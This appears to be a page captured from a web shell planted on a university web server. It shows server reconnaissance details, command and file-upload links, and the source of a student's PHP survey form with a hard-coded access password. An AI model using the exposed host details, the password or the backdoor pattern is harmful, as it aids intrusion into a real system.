Server IP : 172.16.15.8 / Your IP : 3.149.24.145 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/ddpintor/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php session_start(); $pass = $_SESSION['psw']; $_SESSION['psw'] = $pass; if($pass != "ch7hw") print "LEAVE NOW!"; else { ?> <CENTER> <H2> Welcome to this Wonderful Survery Page! </H2> <FORM action=third_Form.php method=post> <P> Name: <input type=textbox name=name> <P> Gender: <input type=radio name=gender value=Male> Male <input type=radio name=gender value=Female> Female <P> Grade: <input type=radio name=grade value=Freshman> Freshamn <input type=radio name=grade value=Sophomore> Sophomore <input type=radio name=grade value=Junior> Junior <input type=radio name=grade value=Senior> Senior <P> Course Number: <input type=textbox name=course> <P> <input type=submit value=Submit> <input type=reset value=Reset> </FORM> </CENTER> <?php } ?>